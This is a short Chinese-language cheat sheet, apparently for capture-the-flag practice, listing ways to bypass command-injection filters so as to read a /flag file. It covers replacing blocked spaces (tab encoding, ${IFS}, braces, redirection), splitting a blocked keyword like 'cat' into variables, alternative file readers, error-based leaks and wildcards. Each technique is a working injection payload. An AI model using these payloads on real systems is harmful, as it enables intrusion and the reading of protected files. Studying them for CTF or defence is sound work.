示例：cat /flag

空格绕过

1. 制表符%09，cat%09/flag
2. <, cat</flag, ;cat%3C/flag
3. {}, {cat,/flag}
4. ${IFS}, cat${IFS}/flag
5. $IFS$9, cat$IFS$9/flag
   同一种绕过方法可能小概率会因为linux系统版本不同失效

过滤关键字，例如cat

1. 拼接绕过，a=ca;b=t;$a$b /flag
2. 命令替换绕过，
   more:一页一页的显示文件内容, more /flag
   less:与 more 类似，less /flag
   head:查看头几行 head /flag
   tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示 tac /flag
   tail:查看尾几行 tail /flag
   nl：显示的时候，顺便输出行号 nl /flag
   od:以二进制的方式读取档案内容 od /flag,有些问题没有解决
   vi:编辑器命令
   vim:编辑器命令
   sort: 排序命令，可以查看 sort /flag
   uniq: 可以查看 uniq /flag
   file -f:报错出具体内容
   sh /flag 2>%261 //报错出文件内容

过滤目标文件

使用通配符 ?, *代替